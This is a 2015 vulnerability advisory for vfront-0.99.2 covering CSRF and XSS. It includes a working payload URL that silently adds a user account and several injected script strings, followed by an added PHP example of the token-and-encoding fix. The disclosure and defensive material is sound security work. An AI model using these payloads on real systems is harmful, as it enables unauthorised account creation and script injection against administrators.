Information Security



From: apparitionsec_(at)_gmail.com <apparitionsec_(at)_gmail.com>
Date: 8 June 2015
Subject: vfront-0.99.2 CSRF & Persistent XSS



[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-VFRONT0602.txt



Vendor:
==============
www.vfront.org



Product:
===================================================================================
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.



Advisory Information:
====================================
CSRF, Persistent XSS & reflected XSS



Vulnerability Detail(s):
=======================


CSRF:
=========
No CSRF token in place, therefore we can add arbitrary users to the system.


Persistent XSS:
================
variabili.php has multiple XSS vectors using the POST method; one input field, 'altezza_iframe_tabella_gid', stores the XSS payload
in the MySQL database, and it is run each time variabili.php is accessed from the victim's browser.


Persisted XSS stored in MySQL DB:
=================================
DB-----> vfront_vfront
TABLE-----> variabili
COLUMN------> valore (will contain our XSS)


Exploit code(s):
===============


CSRF code add arbitrary users to system:
=======================================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%[email protected]com%26passwd%3dhacked%26passwd1%3dhacked');</script>&tabella=&uid=&data_dal=All&data_al=All



Persistent XSS:
================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
Inject XSS into the 'altezza_iframe_tabella_gid' input field to store it in the database:
"/><script>alert(666)</script>



Reflected XSS(s):
=================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>



XSS vulnerable input fields:
============================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid   <------------- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid


Disclosure Timeline:
===================================


Vendor Notification: May 31, 2015
June 2, 2015 : Public Disclosure



Severity Level:
===================================
High



Description:
==========================================================

Request Method(s):
                               [+]  GET & POST

Vulnerable Product:
                               [+]  vfront-0.99.2

Vulnerable Parameter(s):
                               [+]  altezza_iframe_tabella_gid
                               [+]  passo_avanzamento_veloce_gid
                               [+]  n_record_tabella_gid
                               [+]  search_limit_results_gid
                               [+]  max_tempo_edit_gid
                               [+]  home_redirect_gid
                               [+]  formati_attach_gid
                               [+]  default_group_ext_gid
                               [+]  cron_days_min_gid
                               [+]  id_campo
                               [+]  op


Affected Area(s):               [+]  Admin & MySQL DB

===============================================================


(hyp3rlinx)
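The two root causes the advisory reports are the absence of a CSRF token on the admin forms and settings values (such as altezza_iframe_tabella_gid, stored in the variabili table's valore column) being echoed back into HTML without encoding, which also covers the reflected cases (id_campo, op). The following is an added example of how a settings handler in the style of admin/variabili.php would close both holes; it is editorial illustration, not vfront's code and not part of the advisory. The column name nome, the $pdo connection and the $current array holding the stored settings are assumptions; the PHP functions used (random_bytes, hash_equals, filter_var, htmlspecialchars, session_set_cookie_params with the samesite option on PHP 7.3 or later) are standard.

```php
<?php
// Added example (not vfront's code): a settings form like admin/variabili.php
// with a synchroniser CSRF token, input validation and output encoding.
declare(strict_types=1);

// Defence in depth for CSRF: a SameSite session cookie (PHP >= 7.3) means the
// browser does not attach the admin session to cross-site form posts at all.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// --- CSRF: per-session random token, checked on every state-changing POST ---
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(mixed $submitted): bool
{
    // hash_equals() is a constant-time comparison
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// --- Persistent XSS: validate on input, encode on output ---------------------
// A frame height is an integer; anything else (such as "/><script>...) is
// rejected instead of being written to variabili.valore.
function validate_int_setting(string $raw, int $min, int $max): ?int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

// Encode for an HTML attribute or text context; also the fix for the
// reflected parameters (id_campo, op) wherever they are printed.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    $height = validate_int_setting($_POST['altezza_iframe_tabella_gid'] ?? '', 50, 5000);
    if ($height === null) {
        http_response_code(400);
        exit('altezza_iframe_tabella_gid must be an integer');
    }
    // $pdo: assumed existing PDO connection; "nome" as the key column is an
    // assumption (the advisory names only the table and the valore column).
    $stmt = $pdo->prepare('UPDATE variabili SET valore = :v WHERE nome = :n');
    $stmt->execute([':v' => (string) $height, ':n' => 'altezza_iframe_tabella_gid']);
}

// $current: assumed array of settings read back from the variabili table.
// Even a value that somehow reached the DB unvalidated is inert once encoded.
$stored = (string) ($current['altezza_iframe_tabella_gid'] ?? '');
?>
<form method="post" action="variabili.php">
  <input type="hidden" name="csrf_token" value="<?= h(csrf_token()) ?>">
  <label>altezza_iframe_tabella_gid
    <input type="text" name="altezza_iframe_tabella_gid" value="<?= h($stored) ?>">
  </label>
  <button type="submit">Save</button>
</form>
```

With the token check in place, the advisory's utenze.db.php?insert_new style request made from another origin fails with 403 because the attacker cannot read the victim's session token, and the stored payload `"/><script>alert(666)</script>` is never written (rejected by validation) and would be rendered as literal text (`&quot;/&gt;&lt;script&gt;...`) if it were.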

About the site | Terms of use
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod